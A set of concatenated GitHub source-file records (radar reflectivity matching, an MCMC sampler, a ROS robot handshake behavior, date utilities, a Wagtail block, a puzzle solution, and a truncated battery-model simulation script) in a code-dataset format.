np.zeros(nprof)*np.nan # path-integrated GR reflectivity\nstdv1 = np.zeros(nprof)*np.nan # std. dev. of PR reflectivity in sample\nstdv2 = np.zeros(nprof)*np.nan # std. dev. of GR reflectivity in sample\nvolpr = np.zeros(nprof)*np.nan # total volume of PR bins in sample\nvolgr = np.zeros(nprof)*np.nan # total volume of GR bins in sample\n# Loop over relevant PR profiles\nX_axis=\"X_axis\"\nY_axis=\"Y_axis\"\nZ_axis=\"Z_axis\"\nGR_refl_bins=\"GR_bin\"\nPR_refl=\"PR_Ref\"\nsweep= ee\nalok_file_refl_text_file='binned_reflectivity_'+ str(sweep) +'_.txt'\nalok_file_refl_2='matched_reflectivity_data_sweep_'+ str(sweep) +'_.txt'\nf = open(alok_file_refl_text_file, 'wb')\nf.write(\"%-15s %-15s %-15s %-15s %-15s\\n\"%(X_axis, Y_axis, Z_axis, GR_refl_bins, PR_refl))\nfor ii, (ss, rr) in enumerate(zip(vscan,vray)):\n # Index and count valid bins in each profile\n ip = np.where(valid[ss,rr])[0]#important#done\n numbins = len(ip)\n ntotpr[ii]=numbins\n if numbins == 0:\n continue\n # Compute the mean position of these bins\n x[ii]=np.mean(xyzp_pr[ss,rr,ip,0])#done\n y[ii]=np.mean(xyzp_pr[ss,rr,ip,1])#done\n z[ii]=np.mean(xyzp_pr[ss,rr,ip,2])#done\n precip_type[ii]=precipitation_type[ss,rr] #done #save it in matfiles\t\n # Thickness of the layer\n dz[ii]=(numbins * dr_pr) * np.cos( np.radians(alpha[rr]) )#done\n\n # PR averaging volume\n volpr[ii]=np.sum(vol_pr2[rr,ip])#done\n\n # Note mean TRMM beam diameter\n ds[ii]=np.radians(bw_pr) * np.mean( ( (zt-z[ii]) / np.cos( np.radians(alpha[rr]) ) ) )#check in spyder\n\n # Note distance from radar\n s=np.sqrt(x[ii]**2+y[ii]**2)#done\n rs[ii]=(re2+z[ii]) * np.sin(s/re2) / np.cos(np.radians(elev))#done\n \n # This should not be required because we applied ZonalData\n ### Check that sample is within radar range\n ##if r[ii,jj]+ds[ii,jj]/2. gt rmax then continue\n\n ## THIS IS THE ORIGINAL IDL CODE - IS THIS A BUG???\n ##ref1[ii,jj]=MEAN(refp1,/nan)\n ##ref3[ii,jj]=MEAN(refp2,/nan)\n ##ref4[ii,jj]=MEAN(refp3,/nan)\n \n # Simple linear average of reflectivity \n # - we can become fancier in the next step\n # ATTENTION: NEED TO FLIP ARRAY\n PR_reflectivity_bins_considered_for_matching=np.shape(np.flipud(refp) [ss,rr,ip])\n PR_reflectivity_bins_considered_for_matching=float(PR_reflectivity_bins_considered_for_matching[0])\n PR_reflectivity_bins_considered_which_are_above_threshold_value=np.shape(np.where((np.flipud(refp) [ss,rr,ip])>18.0))\n PR_reflectivity_bins_considered_which_are_above_threshold_value=float(PR_reflectivity_bins_considered_which_are_above_threshold_value[1])\n PR_Threshold_percentage=(PR_reflectivity_bins_considered_which_are_above_threshold_value/PR_reflectivity_bins_considered_for_matching)*100\n threshold_percentage_PR[ii] = PR_Threshold_percentage\n #####\n refpr1[ii]=10*np.log10(np.nanmean(10**(np.flipud(refp)[ss,rr,ip]/10))) #donot forget to flip #done #mean of the reflectivity taken here #important\n refpr2[ii]=10*np.log10(np.nanmean(10**(np.flipud(refp_ss)[ss,rr,ip]/10)))\n refpr3[ii]=10*np.log10(np.nanmean(10**(np.flipud(refp_sh)[ss,rr,ip]/10)))\n \n ## Not sure why we need this...\n ### Note the number of rejected bins\n ##nrej1[ii,jj]=ROUND(TOTAL(FINITE(refp1,/nan)))\n ##if FINITE(stdv1[ii,jj]) eq 0 and np-nrej1[ii,jj] gt 1 then STOP\n\n # SHOULD WE USE ZONALDATA INSTEAD? COULD BE MORE ACCURATE, BUT ALSO SLOWER\n # WE COULD BASICALLY START A NEW LOOP HERE AND RUN ZONALDATA BEFORE\n \n # Compute the horizontal distance to all the GR bins\n d = np.sqrt((gr_xyz[...,0]-x[ii])**2 + (gr_xyz[...,1]-y[ii])**2)\n\n # Find all GR bins within the SR beam\n aa, bb = np.where(d <= ds[ii]/2.)\n\n # Store the number of bins\n ntotgr[ii] = len(aa)\n\n if len(aa) == 0:\n continue\n\n # Extract the relevant GR bins\n\n # Compute the GR averaging volume\n volgr[ii]=np.sum(vol_gr[aa,bb])\n\n # Average over those bins that exceed the reflectivity threshold \n # IDL code does exponential distance and volume weighting\n # Let's try simple mean first,\n # THEN ZonalStats!\n\n #print('GR refl shape:',np.shape(ref_gr[aa,bb]))\n GR_reflectivity_bins_considered_for_matching=np.shape(ref_gr[aa,bb])\n GR_reflectivity_bins_considered_for_matching=float(GR_reflectivity_bins_considered_for_matching[0])\n GR_reflectivity_bins_considered_which_are_above_threshold_value=np.shape(np.where(ref_gr[aa,bb].data>=0.0))\n GR_reflectivity_bins_considered_which_are_above_threshold_value=float(GR_reflectivity_bins_considered_which_are_above_threshold_value[1])\n GR_Threshold_percentage=(GR_reflectivity_bins_considered_which_are_above_threshold_value/GR_reflectivity_bins_considered_for_matching)*100\n threshold_percentage_GR[ii] = GR_Threshold_percentage\n #print('GR threshold percentage:',GR_Threshold_percentage)\n ####\n refgr1[ii]=10*np.log10(np.nanmean(10**(ref_gr[aa,bb]/10)))\n refgr2[ii]=10*np.log10(np.nanmean(10**(ref_gr_ku[aa,bb]/10)))\n GR_1=np.zeros(numbins)\n GR_2=np.zeros(numbins)\n if (np.sum(np.isnan(np.flipud(refp)[ss,rr,ip]))>0):\n GR_1[:]=np.nan\n GR_2[:]=np.nan\n elif (np.sum(np.abs(np.flipud(refp)[ss,rr,ip]))==0):\n GR_1[:]=refgr1[ii]/numbins\n GR_2[:]=refgr2[ii]/numbins\n elif (np.sum(np.abs(np.flipud(refp)[ss,rr,ip]))>0):\n for metrs in range(numbins):\n GR_1[metrs]=10*np.log10(10**(refgr1[ii]/10)*(10**(np.flipud(refp)[ss,rr,ip[metrs]]/10))/(np.sum(10**(np.flipud(refp)[ss,rr,ip]/10))))\n GR_2[metrs]=10*np.log10(10**(refgr2[ii]/10)*(10**(np.flipud(refp)[ss,rr,ip[metrs]]/10))/(np.sum(10**(np.flipud(refp)[ss,rr,ip]/10))))\n for m in range(numbins):\n k=ip[m]\n #print('x:',xyzp_pr[ss,rr,ip[m],0],'y:',xyzp_pr[ss,rr,ip[m],1],'z:',xyzp_pr[ss,rr,ip[m],2],'gr refl:',refgr2[ii],'refl pr:',np.flipud(refp)[ss,rr,ip[m]])\n #print(\"%-15f %-15f %-15f %-15f %-15f\"%(xyzp_pr[ss,rr,ip[m],0], xyzp_pr[ss,rr,ip[m],1], xyzp_pr[ss,rr,ip[m],2], refgr2[ii], np.flipud(refp)[ss,rr,ip[m]]))\n f.write(\"%-15f %-15f %-15f %-15f %-15f\\n\"%(x[ii], y[ii], xyzp_pr[ss,rr,ip[m],2], GR_2[m], np.flipud(refp)[ss,rr,ip[m]]))\n \t#print(\"beam diameter:\",ds[ii])\nf.close() \nfig = pl.figure(figsize=(12,5))\nax = fig.add_subplot(121, aspect=\"equal\")\npl.scatter(refgr1, refpr1, marker=\"+\", c=\"black\")\npl.plot([0,60],[0,60], linestyle=\"solid\", color=\"black\")\npl.xlim(10,50)\npl.ylim(10,50)\npl.xlabel(\"GR reflectivity (dBZ)\")\npl.ylabel(\"PR reflectivity (dBZ)\")\nax = fig.add_subplot(122)\npl.hist(refgr1[refpr1>-10], bins=np.arange(-10,50,5), edgecolor=\"None\", label=\"GR\")\npl.hist(refpr1[refpr1>-10], bins=np.arange(-10,50,5), edgecolor=\"red\", facecolor=\"None\", label=\"PR\")\npl.xlabel(\"Reflectivity (dBZ)\")\npl.legend()\nfig = pl.figure(figsize=(12,12))\nax = fig.add_subplot(121, aspect=\"equal\")\npl.scatter(x, y, c=refpr1, cmap=pl.cm.jet, vmin=0, vmax=50, edgecolor=\"None\")\npl.title(\"PR reflectivity\")\npl.grid()\nax = fig.add_subplot(122, aspect=\"equal\")\npl.scatter(x, y, c=refgr1, cmap=pl.cm.jet, vmin=0, vmax=50, edgecolor=\"None\")\npl.title(\"GR reflectivity\")\npl.grid()\nmat_file_data={}\nmat_file_data.update({'x': x, 'y': y, 'z': z, 'refl_pr': refpr1,\n 'ref_gr': refgr1,'ref_gr_ku':refgr2, 'precipitation_type':precip_type, \n\t\t 'Threshold_Percentage_GR':threshold_percentage_GR,\n\t\t 'Threshold_Percentage_PR':threshold_percentage_PR#'All_PR_coords_axis':xyzp_pr,\n\t\t #'Average_BB_Height':median_bb_height, 'Average_BB_Width':bb_width,\n\t\t #'Overpass_time_diff':abs(time_diff_for_orbit)\n\t\t })\n#sio.savemat(alok_file_coord, {'x':np.x},{'y':np.y})\nsio.savemat(alok_file_refl_2, mat_file_data)\n","repo_name":"alok-iit-108/binned-volume-matching","sub_path":"alignment_CAGE_demo.py","file_name":"alignment_CAGE_demo.py","file_ext":"py","file_size_in_byte":27454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42468166502","text":"# -*- coding: utf-8 -*-\n\"\"\"\nA base sampler class.\n\"\"\"\n\nfrom __future__ import (absolute_import, division, print_function, \n unicode_literals)\n\nimport numpy as np\n\nclass Sampler(object):\n \"\"\"\n An abstract sampler object that implements basic helper functions\n required in most MCMC samplers.\n\n Parameters\n ----------\n\n dim : int\n The number of dimensions in the parameter space. \n lnprobfn : function\n A function that takes a vector in the parameter space as input and \n returns the natural logarithm of the probability at that position. \n args : list (optional)\n Positional arguments for ``lnprobfn``. ``lnprobfn`` will be called \n as ``lnprobfn(p, *args, **kwargs)``. \n kwargs : dict (optional)\n Keyword arguments for ``lnprobfn``. ``lnprobfn`` will be called as \n ``lnprobfn(p, *args, **kwargs)``.\n \"\"\"\n def __init__(self, dim, lnprobfn, args=[], kwargs={}):\n self.dim = dim\n self.lnprobfn = lnprobfn\n self.args = args\n self.kwargs = kwargs\n\n # Starting the random number generator\n self._random = np.random.mtrand.RandomState()\n\n self.reset()\n \n def reset(self):\n \"\"\"\n Clear the ``chain``, ``lnprobability`` and reset the book-keeping\n parameters.\n \"\"\"\n self._chain = np.empty((0, self.dim))\n self._lnprob = np.empty(0)\n \n self.iterations = 0\n self.accepted = 0\n self._last_run = None\n \n @property\n def random_state(self):\n \"\"\"The state of the internal random number generator.\"\"\"\n return self._random.get_state()\n\n @random_state.setter\n def random_state(self, state):\n \"\"\"\n Tries to set the state of the random number generator. It fails \n silently if it doesn't work.\n \"\"\"\n try:\n self._random.set_state(state)\n except:\n pass\n\n @property\n def acceptance_fraction(self):\n \"\"\"The fraction of the proposed steps that were accepted.\"\"\"\n return self.accepted / self.iterations\n \n @property\n def chain(self):\n \"\"\"Pointer to the Markov chain.\"\"\"\n return self._chain\n \n @property\n def lnprobability(self):\n \"\"\"\n List of log-probability values associated with each step in the chain.\n \"\"\"\n return self._lnprob\n \n def get_lnprob(self, p):\n \"\"\"The log-probability at the given position.\"\"\"\n return self.lnprobfn(p, *self.args, **self.kwargs)\n \n def sample(self, *args, **kwargs):\n raise NotImplementedError(\"The sampling routine must be implemented \"\n \"by subclasses\")\n \n def run(self, p0, N, lnprob0=None, rstate0=None, **kwargs):\n \"\"\"\n Run ``sample`` for ``N`` iterations and return the result.\n\n Parameters\n ----------\n\n p0 : list\n The initial position vector.\n N : int\n Number of iterations to run ``sample``. \n lnprob0 : list (optional)\n The log-probability at position ``p0``.\n rstate0 : list (optional)\n The state of the random number generator. \n kwargs : dict (optional)\n Other parameters that are provided directly to ``sample``.\n\n Returns\n -------\n\n results : tuple\n The final position vector, log-probability and state of the\n random number generator.\n \n Notes\n -----\n\n If ``p0`` is not provided, it will take the value from the last run.\n This will also be done for ``lnprob0`` and ``rstate0``.\n \"\"\"\n if p0 is None:\n if self._last_run is None:\n raise ValueError(\"Cannot have p0=None if run has never \"\n \"been called.\")\n p0 = self._last_run[0]\n if lnprob0 is None:\n lnprob0 = self._last_run[1]\n if rstate0 is None:\n rstate0 = self._last_run[2]\n \n for results in self.sample(p0, lnprob0, rstate0, iterations=N, \n **kwargs):\n pass\n \n # Store for ``p0=None`` case\n self._last_run = results[:3]\n\n return results\n","repo_name":"fgittins/montepython","sub_path":"montepython/sampler.py","file_name":"sampler.py","file_ext":"py","file_size_in_byte":4327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"724162833","text":"#! /usr/bin/env python\n# License: Apache 2.0. See LICENSE file in root directory.\n#\n# For simple behaviors that can run syncronously, Python provides\n# a simple way to implement this. Add the work of your behavior\n# in the execute_cb callback\n#\n\nimport rospy\nimport actionlib\nimport behavior_common.msg\n\nimport time\nimport random\nfrom std_msgs.msg import Float64\nfrom std_msgs.msg import UInt16\nfrom std_msgs.msg import Bool\nfrom std_msgs.msg import Empty\n\n# for talking\nimport actionlib\nimport actionlib.action_client\nimport audio_and_speech_common.msg\n\n# for servos\n#from sheldon_servos.head_servo_publishers import *\n#from sheldon_servos.right_arm_servo_publishers import *\n#from sheldon_servos.left_arm_servo_publishers import *\n\nfrom sheldon_servos.standard_servo_positions import *\nfrom sheldon_servos.set_servo_speed import *\nfrom sheldon_servos.set_servo_torque import *\n\n# Globals\n\ndef move_arm_shake_preliminary():\n pub_right_arm_shoulder_rotate.publish(0.9)\n pub_right_arm_shoulder_lift.publish(0.05)\n head_home() \n pub_head_pan.publish(-0.20)\n\ndef move_arm_shake_ready():\n pub_right_arm_shoulder_rotate.publish(0.9) #1.12\n pub_right_arm_shoulder_lift.publish(0.05)\n pub_right_arm_elbow_rotate.publish(-0.47)\n pub_right_arm_elbow_bend.publish(1.37)\n pub_right_arm_wrist_rotate.publish(-1.35)\n pub_right_arm_gripper_finger.publish(0.0)\n\ndef move_arm_shake_up():\n pub_right_arm_elbow_bend.publish(1.47)\n #head_home() \n\ndef move_arm_shake_down():\n pub_right_arm_elbow_bend.publish(1.09)\n #head_home() \n\n\n\nclass BehaviorAction(object):\n _feedback = behavior_common.msg.behaviorFeedback()\n _result = behavior_common.msg.behaviorResult()\n\n def __init__(self, name):\n self._action_name = name\n self._as = actionlib.SimpleActionServer(self._action_name, behavior_common.msg.behaviorAction, execute_cb=self.execute_cb, auto_start = False)\n self._as.start()\n\n rospy.loginfo('%s: Initializing Shake Hands behavior service' % (self._action_name))\n\n # enable/disable microphone when robot is moving servos. \n # (Note system_enable vs. speech_enable vs. user_enable)\n self.mic_system_enable_pub = rospy.Publisher('/microphone/system_enable', Bool, queue_size=1) \n\n sensor_sub = rospy.Subscriber('/arm_hand_sensor_right', UInt16, self.sensor_cb) # hand sensor messages\n\n rospy.loginfo('%s: Initialized behavior service' % (self._action_name))\n\n\n def sensor_cb(self, msg):\n # rospy.loginfo(\"%s: sensor_cb called\", self._action_name)\n nearest_object_to_hand = msg.data\n if nearest_object_to_hand < 100: # mm\n #rospy.loginfo(\"%s: sensor_cb: Hand detected\", self._action_name)\n self.hand_detected = True\n else:\n self.hand_detected = False\n\n # ===========================================================================\n # Utility functions\n\n def InterruptRequested(self):\n # check if preempt has been requested by the client\n if self._as.is_preempt_requested():\n rospy.logwarn('=====> %s: BEHAVIOR PREEMPTED!' % self._action_name)\n self.cleanup(True)\n return True\n else:\n return False\n\n def cleanup(self, interrupted):\n # clean everyting up before exiting\n\n # Restore Servo defaults\n SetServoTorque(0.5, all_servo_joints)\n SetServoSpeed(0.5, all_servo_joints)\n\n # Move arms to ready position. Leave head looking at user until idle head tracking kicks in\n right_arm_home()\n left_arm_home()\n\n # allow time for servos to complete moving\n time.sleep(2) \n\n # un-mute the microphone\n self.mic_system_enable_pub.publish(True)\n\n if interrupted:\n rospy.loginfo('%s: Behavior preempted' % self._action_name)\n self._as.set_preempted()\n else:\n rospy.loginfo('%s: Behavior complete' % self._action_name)\n self._as.set_succeeded(self._result)\n\n\n #====================================================================\n # Execute Behavior\n def execute_cb(self, goal):\n rospy.loginfo('%s: Executing behavior' % (self._action_name))\n rospy.loginfo( \"Param1: '%s'\", goal.param1)\n rospy.loginfo( \"Param2: '%s'\", goal.param2)\n\n # ====== Behavior Implementation ====== \n success = True\n r = rospy.Rate(1.0)\n\n # initialization\n rospy.loginfo(\"Waiting for speech server (press ctrl-c to cancel at anytime)\")\n client = actionlib.SimpleActionClient(\"/speech_service\", audio_and_speech_common.msg.speechAction)\n client.wait_for_server()\n\n SetServoTorque(1.5, all_servo_joints) \n SetServoSpeed(0.8, all_servo_joints)\n SetSingleServoSpeed(1.5, 'right_arm_shoulder_rotate_joint')\n #SetSingleServoSpeed(1.5, 'left_arm_shoulder_rotate_joint')\n\n # mute the microphone\n self.mic_system_enable_pub.publish(False)\n \n # Move arm into shake position\n move_arm_shake_preliminary()\n time.sleep(1)\n move_arm_shake_ready()\n\n # say hello while arms are moving\n rospy.loginfo(\"Talking\")\n goal = audio_and_speech_common.msg.speechGoal(text_to_speak=\"hello\")\n client.send_goal(goal)\n result = client.wait_for_result() # wait for speech to complete\n rospy.loginfo(\"Speech goal returned result: %d\", result)\n\n # wait for sensor reading, indicating person is holding hand\n for i in range (1,26): # note, about 6 seconds of this time the arm is still moving into position\n if self.InterruptRequested():\n return\n if self.hand_detected:\n rospy.loginfo(\"DBG: hand detected\")\n break\n time.sleep(0.5) \n\n if not self.hand_detected:\n # no person detected\n rospy.loginfo(\"Talking\")\n goal = audio_and_speech_common.msg.speechGoal(text_to_speak=\"well, this is awkward\")\n client.send_goal(goal)\n result = client.wait_for_result() # wait for speech to complete\n rospy.loginfo(\"Speech goal returned result: %d\", result)\n self.cleanup(False)\n return\n\n # say something nice\n rospy.loginfo(\"Talking\")\n goal = audio_and_speech_common.msg.speechGoal(text_to_speak=\"I am pleased to meet you\")\n client.send_goal(goal)\n # Don't wait for speech to complete, start shaking hands\n #result = client.wait_for_result() # wait for speech to complete\n #rospy.loginfo(\"Speech goal returned result: %d\", result)\n time.sleep(2)\n\n # Start shaking hands. \n for i in range(1, 5):\n\n move_arm_shake_up() # 1\n if self.InterruptRequested():\n return\n time.sleep(0.5)\n\n move_arm_shake_down()\n if self.InterruptRequested():\n return\n time.sleep(0.5)\n\n if not self.hand_detected:\n # no person detected, they must have let go\n rospy.loginfo(\"DBG: person let go early\")\n self.cleanup(False)\n return\n\n # done shaking hands, wait for user to let go\n for i in range (1,6):\n if self.InterruptRequested():\n return\n if not self.hand_detected: # user let go\n rospy.loginfo(\"DBG: person let go at appropriate time\")\n break\n time.sleep(0.5) \n\n if self.hand_detected:\n # person still holding hand\n rospy.loginfo(\"Talking\")\n goal = audio_and_speech_common.msg.speechGoal(text_to_speak=\"um, you can let go now\")\n client.send_goal(goal)\n result = client.wait_for_result() # wait for speech to complete\n rospy.loginfo(\"Speech goal returned result: %d\", result)\n \n\n # wait for user to let go\n for i in range (1,10):\n if self.InterruptRequested():\n return\n if not self.hand_detected:\n rospy.loginfo(\"DBG: person finally let go\")\n break\n time.sleep(0.5) \n\n\n # Behavior Done, clean up\n # Includes moving head and arms back to ready position\n self.cleanup(False)\n \n \nif __name__ == '__main__':\n rospy.init_node('shake_hands_behavior')\n server = BehaviorAction(rospy.get_name())\n rospy.spin()\n","repo_name":"shinselrobots/sheldon","sub_path":"sheldon_behaviors/shake_hands_behavior/scripts/behavior_service.py","file_name":"behavior_service.py","file_ext":"py","file_size_in_byte":8486,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40494185319","text":"# -*- coding:utf-8 -*-\nimport calendar\nfrom datetime import date, datetime, timedelta\nfrom dateutil.relativedelta import relativedelta\nfrom six import string_types\n__author__ = 'denishuang'\n\n\ndef format_the_date(the_date=None):\n if not the_date:\n return date.today()\n if isinstance(the_date, string_types):\n return datetime.strptime(the_date[:10], \"%Y-%m-%d\").date()\n if isinstance(the_date, datetime):\n return the_date.date()\n return the_date\n\n\ndef get_date_by_day(day, today=None):\n today = format_the_date(today)\n endday = calendar.monthrange(today.year, today.month)[1]\n if day > endday:\n day = endday\n return date(today.year, today.month, day)\n\n\ndef get_next_date(the_date=None, days=1):\n the_date = format_the_date(the_date)\n return the_date + timedelta(days=days)\n\ndef date_range(begin_date, end_date):\n d = format_the_date(begin_date)\n end_date = format_the_date(end_date)\n if end_date= d:\n yield d\n d = d+timedelta(days=1)\n\ndef get_this_and_next_monday(the_date=None):\n the_date = format_the_date(the_date)\n monday = the_date + timedelta(days=-the_date.weekday())\n next_monday = monday + timedelta(days=7)\n return monday, next_monday\n\n\ndef get_monday_and_sunday(the_date=None):\n the_date = format_the_date(the_date)\n monday = the_date + timedelta(days=-the_date.weekday())\n sunday = monday + timedelta(days=6)\n return monday, sunday\n\n\ndef get_this_and_next_month_first_day(the_date=None):\n the_date = format_the_date(the_date)\n month_first_day = date(the_date.year, the_date.month, 1)\n next_month_first_day = month_first_day + relativedelta(months=1)\n return month_first_day, next_month_first_day\n\n\ndef get_last_and_this_month_first_day(the_date=None):\n the_date = format_the_date(the_date)\n this_month_first_day = date(the_date.year, the_date.month, 1)\n last_month_first_day = this_month_first_day + relativedelta(months=-1)\n return last_month_first_day, this_month_first_day\n\n\ndef get_month_first_day_from_now(the_date=None, month_delta=0):\n the_date = format_the_date(the_date)\n month_first_day = date(the_date.year, the_date.month, 1)\n return month_first_day + relativedelta(months=month_delta)\n\n\ndef get_current_year_last_month():\n this_day = date.today()\n last_month_this_day = this_day + relativedelta(months=-1)\n return last_month_this_day.strftime('%Y-%m')\n\n\ndef get_current_month(the_date=None):\n the_date = format_the_date(the_date)\n return the_date.strftime('%Y-%m')\n\n\ndef weeks_between(d1, d2):\n if isinstance(d1, string_types):\n d = d1.split('-')\n d1 = datetime(int(d[0]), int(d[1]), int(d[2]))\n if isinstance(d2, string_types):\n d = d2.split('-')\n d2 = datetime(int(d[0]), int(d[1]), int(d[2]))\n return abs(d2.isocalendar()[1] - d1.isocalendar()[1])\n\n\ndef get_week_of_month(d=None):\n if d is None:\n d = datetime.now()\n week_of_year_end = d.strftime(\"%W\")\n week_of_year_begin = datetime(d.year, d.month, 1).strftime(\"%W\")\n return int(week_of_year_end) - int(week_of_year_begin) + 1\n\n\ndef get_pre_month(d=None):\n import calendar\n if d is None:\n d = datetime.now()\n if isinstance(d, string_types):\n d = datetime(int(d.split('-')[0]), int(d.split('-')[1]), 1)\n this_month_days = calendar.monthrange(d.year, d.month)[1]\n the_day_of_pre_month = d - timedelta(days=this_month_days)\n return datetime.strftime(the_day_of_pre_month, '%Y-%m')\n\n\ndef first_date_of_month(month=None):\n if month:\n return datetime.strptime(\"%s-01\" % month, \"%Y-%m-%d\")\n d = datetime.now()\n return date(d.year, d.month, 1)\n\n\ndef get_age(born):\n today = date.today()\n try:\n birthday = born.replace(year=today.year)\n except ValueError:\n # raised when birth date is February 29\n # and the current year is not a leap year\n birthday = born.replace(year=today.year, day=born.day - 1)\n if birthday > today:\n return today.year - born.year - 1\n else:\n return today.year - born.year\n\n\ndef is_valid_date(strdate):\n \"\"\"判断是否是一个有效的日期字符串\"\"\"\n try:\n if \":\" in strdate:\n datetime.strptime(strdate, \"%Y-%m-%d %H:%M:%S\")\n else:\n datetime.strptime(strdate, \"%Y-%m-%d\")\n return True\n except:\n return False\n\ndef get_period_by_name(name):\n from .dateutils import get_next_date, format_the_date\n from datetime import datetime, timedelta\n if name == \"今天\":\n begin_time = format_the_date()\n end_time = get_next_date(begin_time)\n elif name == \"昨天\":\n end_time = format_the_date()\n begin_time = get_next_date(end_time, -1)\n elif name.startswith(\"近\") and name.endswith(\"分钟\"):\n end_time = datetime.now()\n begin_time = end_time + timedelta(minutes=-int(name[1:-2]))\n elif name.startswith(\"近\") and name.endswith(\"小时\"):\n end_time = datetime.now()\n begin_time = end_time + timedelta(hours=-int(name[1:-2]))\n elif name.startswith(\"近\") and name.endswith(\"天\"):\n end_time = get_next_date()\n begin_time = get_next_date(end_time, -int(name[1:-1]))\n elif \"至\" in name:\n drs = name.split(\"至\")\n begin_time = format_the_date(drs[0])\n end_time = get_next_date(drs[1])\n else:\n raise ValueError(\"日期范围格式不正确:%s\" % name)\n return (begin_time, end_time)\n\nCOMMON_DATES = {\n 'today': lambda d=None: format_the_date(the_date=d).isoformat(),\n 'this_month': lambda d=None: get_current_month(the_date=d),\n 'this_year': lambda d=None: format_the_date(the_date=d).year,\n 'yesterday': lambda d=None: get_next_date(the_date=d,days=-1).isoformat(),\n 'tomorrow': lambda d=None: get_next_date(the_date=d,days=1).isoformat(),\n 'week_begin': lambda d=None: get_monday_and_sunday(the_date=d)[0].isoformat(),\n 'week_end': lambda d=None: get_monday_and_sunday(the_date=d)[1].isoformat(),\n 'month_begin': lambda d=None: get_month_first_day_from_now(the_date=d).isoformat(),\n 'month_end': lambda d=None: get_next_date(get_this_and_next_month_first_day(the_date=d)[1], -1).isoformat(),\n 'next_month_begin': lambda d=None: get_this_and_next_month_first_day(the_date=d)[1].isoformat()\n}\n","repo_name":"szuprefix/py-xyz-util","sub_path":"xyz_util/dateutils.py","file_name":"dateutils.py","file_ext":"py","file_size_in_byte":6400,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22732392392","text":"from wagtail.core import blocks\nfrom wagtail.images.blocks import ImageChooserBlock\n\n\nclass AnnouncementBlock(blocks.StructBlock):\n class Meta:\n verbose_name = 'Bloc Annonce'\n template = \"home/blocks/announce.html\"\n\n title = blocks.CharBlock(verbose_name='titre')\n image = ImageChooserBlock(required=False)\n content = blocks.RichTextBlock(verbose_name='contenu')\n","repo_name":"codeanonorg/tutoweb","sub_path":"home/blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"9066554816","text":"#\n# /r/dailyprogrammer Challenge #262 [Easy] \n# MaybeNumeric \n# \t\t\t\t\t\t\t\t\t\t \n# Short Summary: The scope of this problem is kind of specific, so please see\n# the provided link for an accurare description of this problem\n# \t\t\t\t\t\t\t\t\t\t \n# Full Problem: https://www.reddit.com/r/dailyprogrammer/comments/3xdmtw/20151218_challenge_245_hard_guess_whois/\n# \n\ndef flatten(i):\n return sum(i, [])\n\ndef MaybeNumeric(input, delim = '`'):\n for word in flatten([x.split(delim) for x in input]):\n try:\n if( all(float(w) for w in word.split()) and delim == '`' ):\n yield list(MaybeNumeric([word], ' '))\n continue\n else:\n raise ArgumentError('Delimiter was not backtick')\n except Exception as e:\n try:\n float(word)\n yield '{} ({})'.format(word, 'number')\n except ValueError as e:\n yield '{} ({})'.format(word, 'string')\n except OverflowError as e:\n yield '{} ({})'.format(word, 'number')\n\n# Example usage (looks funky, I know)\n# print(list(\n# MaybeNumeric(['123','44.234','0x123N'])\n# ))\n","repo_name":"ennukee/djb_script_challenges","sub_path":"coding_challenges/dailyprogrammer/Python/Easy/262_easy/262_easy.py","file_name":"262_easy.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24686766227","text":"import os\nimport json\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom DESC_1RC import DESC_1RC\nfrom datetime import datetime\n\nnow = datetime.now()\nstart = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n\n\ntemps=[-5, 5, 15, 25, 35, 45]\nmags= [20, 20, 40, 50, 50, 50]\n\n\n# Read modelocv.json file that contains parameters just for OCV data\n# Such OCV0, OCVrel OCVeta Q etc.\nwith open('model_files/DESC1Model_SLSQP.json') as json_file:\n model = json.load(json_file)\n\n# Define variable for rmse value\nrmse = np.zeros(len(temps))\n\n# Define font size for labels and colors\nxfontsize = 12\nyfontsize = 12\ncolors=['b', # blue\n 'g', #green\n 'r', #red\n 'c', #cyan\n 'm', #magenta\n 'y',# yellow\n 'orange', #orange\n 'purple', #purple\n ]\n\nfor erhan in range(len(temps)):\n\n # Read UDDS dynamic data for specified temperature value\n if(temps[erhan]>0):\n script1 = \"dyn_data/THUN100_DYN_%02d_P%02d_S1.csv\" %(mags[erhan], temps[erhan]) \n data = pd.read_csv(script1)\n else:\n script1 = \"dyn_data/THUN100_DYN_%02d_N%02d_S1.csv\" %(mags[erhan], np.abs(temps[erhan])) \n data= pd.read_csv(script1)\n \n # Get voltage and current values.\n current = np.asarray(data['current'])\n voltage = np.asarray(data['voltage'])\n time = np.asarray(data['time'])/3600\n # Create model instance and initiliaze for the specified temperature.\n cell = DESC_1RC(model=model , temp=temps[erhan], dt=1.0,use_OCVS=True)\n\n # Plot simulated output and cell data output\n plt.figure()\n est_voltage = cell.fun([1.0,0.0,0.0],current)\n rmse[erhan]=np.sqrt(((voltage - est_voltage) ** 2).mean())\n plt.plot(time, est_voltage, color=colors[erhan], label='Simulation')\n plt.plot(time, voltage, label='True')\n plt.legend()\n plt.xlabel('Time(h)', fontsize = xfontsize, fontweight = 'bold')\n plt.ylabel('Voltage', fontsize = xfontsize, fontweight = 'bold')\n plt.title('Estimated Output Voltage for T=%02d, RMSE = %2.2fmV' % (temps[erhan],rmse[erhan]*1000))\n plt.show()\n plt.savefig('figures/simulations/Simulation_T_%02d.png' % temps[erhan], dpi=600, bbox_inches='tight')\n # Print rms error.\n print('RMS=%fmV'%(rmse[erhan]*1000))\n print('------------------------------------------------------------')\n\n# Get stop time\nnow = datetime.now()\nstop = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n\n# Delete report file if exist\nif os.path.exists(\"reports/simulations/simulation_report.txt\"):\n os.remove(\"reports/simulations/simulation_report.txt\")\n\n# Create a report file and write results.\nf = open(\"reports/simulations/simulation_report.txt\", \"a\")\nf.write('\\r\\n')\nf.write('Simulation Results for 